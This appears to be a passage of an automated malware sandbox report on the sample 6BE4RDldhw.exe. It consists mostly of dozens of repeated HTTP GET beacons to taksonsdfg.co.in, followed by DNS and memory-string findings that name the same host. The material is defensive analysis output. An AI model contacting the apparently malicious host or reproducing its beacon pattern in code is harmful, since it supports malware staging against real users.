      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficDNS traffic detected: DNS query: taksonsdfg.co.in
      Source: 6BE4RDldhw.exe, 6BE4RDldhw.exe, 00000000.00000002.2598433621.000000007FA30000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2583380707.0000000002CD3000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1333431137.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1333810883.000000007F8EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
      Source: 6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in
      Source: 6BE4RDldhw.exe, 00000000.00000003.1738626305.0000000000904000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2433890987.0000000000939000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1519974580.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/
      Source: 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/)r
      Source: 6BE4RDldhw.exe, 00000000.00000003.1394882795.00000000008D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/05
